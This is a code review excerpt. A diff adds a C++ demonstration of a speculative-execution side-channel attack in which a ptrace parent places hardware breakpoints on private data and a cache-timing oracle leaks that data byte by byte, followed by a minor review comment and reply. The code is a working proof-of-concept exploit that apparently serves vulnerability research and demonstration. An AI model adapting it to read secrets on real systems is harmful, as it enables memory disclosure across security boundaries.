demos/speculation_over_hw_breakpoint.cc

```diff
@@ -0,0 +1,203 @@
+  const std::array<BigByte, 256> &isolated_oracle = sidechannel.GetOracle();
+
+  for (int run = 0;; ++run) {
+    size_t safe_offset = run % data_length;
+    sidechannel.FlushOracle();
+
+    // Successful access of the safe offset.
+    ForceRead(isolated_oracle.data() + static_cast<size_t>(data[safe_offset]));
+
+    // This access traps on hardware breakpoint and the tracer shifts the
+    // instruction pointer to the afterspeculation label.
+    ForceRead(isolated_oracle.data() + static_cast<size_t>(data[offset]));
+
+    std::cout << "Dead code. Must not be printed." << std::endl;
+
+    // The exit call must not be unconditional, otherwise clang would optimize
+    // out everything that follows it and the linking would fail.
+    if (strlen(public_data) != 0) {
+      exit(EXIT_FAILURE);
+    }
+
+    // Tracer moves the instruction pointer to this label.
+    asm volatile("afterspeculation:");
+
+    std::pair<bool, char> result =
+        sidechannel.RecomputeScores(public_data[safe_offset]);
+
+    if (result.first) {
+      return result.second;
+    }
+
+    if (run > 100000) {
+      std::cerr << "Does not converge " << result.second << std::endl;
+      exit(EXIT_FAILURE);
+    }
+  }
+}
+
+void ChildProcess() {
+  // Precompute the length of private data, so that we don't have to access it
+  // when it contains the hardware breakpoint.
+  size_t private_data_length = strlen(private_data);
+  // Similarly we have to precompute the length of public data, because on some
+  // systems the __strlen_avx2 executed on public data can touch the breakpoint
+  // in private data.
+  size_t public_data_length = strlen(public_data);
+
+  // Allow the parent to trace child's execution.
+  int res = ptrace(PTRACE_TRACEME, 0, nullptr, nullptr);
+  if (res == -1) {
+    std::cerr << "PTRACE_TRACEME failed." << std::endl;
+    exit(EXIT_FAILURE);
+  }
+
+  std::cout << "Leaking the string: ";
+  std::cout.flush();
+  const size_t private_offset = private_data - public_data;
+  for (size_t i = 0; i < private_data_length; ++i) {
+    // Synchronize with the parent. Let it setup the hardware breakpoint on the
+    // next character.
+    raise(SIGSTOP);
+    MemoryAndSpeculationBarrier();
+    std::cout << LeakByte(public_data, public_data_length, private_offset + i);
+    std::cout.flush();
+  }
+  std::cout << "\nDone!\n";
+}
+
+void ParentProcess(pid_t child) {
+  // Index of the breakpoint in the private data.
+  size_t index = 0;
+  while (true) {
+    int wstatus, res;
+    wait(&wstatus);
+    if (WIFSTOPPED(wstatus) && WSTOPSIG(wstatus) == SIGSTOP) {
+      // The child stopped itself with "raise(SIGSTOP)". We have to put the
+      // breakpoint on the current character of private_data and let it
+      // continue.
+      // Pointing dr0 on the current index in private_data and incrementing
+      // the index.
+      res = ptrace(PTRACE_POKEUSER, child, offsetof(user, u_debugreg[0]),
+                   private_data + index++);
```

Comment:
Let's move the increment of `index` into its own statement

Reply:
Done.